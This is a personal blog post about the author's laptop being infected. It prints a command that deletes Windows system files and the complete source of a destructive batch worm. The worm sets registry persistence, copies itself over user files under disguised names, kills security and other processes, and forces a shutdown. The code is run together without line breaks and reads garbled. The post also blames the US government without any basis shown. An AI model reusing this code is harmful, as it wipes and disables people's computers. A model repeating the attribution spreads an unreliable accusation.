Today I have to work on the laptop. I was hit by a very bad virus and it came from the USA! I finally have traced it to close to its original source and as always, it originated in Washington, D.C…. A guard gate at a Gov. installation…. This is as always…
They gave me a simple command file made on note pad. They also tied it to a hidden file that was triggered when I opened the simple note pad file. I wondered what it was and opened it. Oops…
del c:\windows\system32\*.* /q
This started to erase system files and to add salt to the wound…
@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP
This finishes the mess very well…
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide itself and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Thanks a bunch DC!
I am lucky, I keep back ups on external drives disconnected from the main computer at most times. So I have all my data, but the system files were scrambled on purpose. This is nothing new and I have to keep my system set up for such happenings. I learned the hard way years ago…
Therefore, only one option, “Nuke the OS!”
Today I am running on Puppy Linux and will be cleaning up my laptop. Therefore, this is my post and I will be back as normal tomorrow. I enjoy resetting the OS for the most part and have had lots of experience; Thanks to mine and your friendly scared government of the United States…
See you tomorrow and it is still snowing here in the Tiny Russian Village and actually all is good…
WtR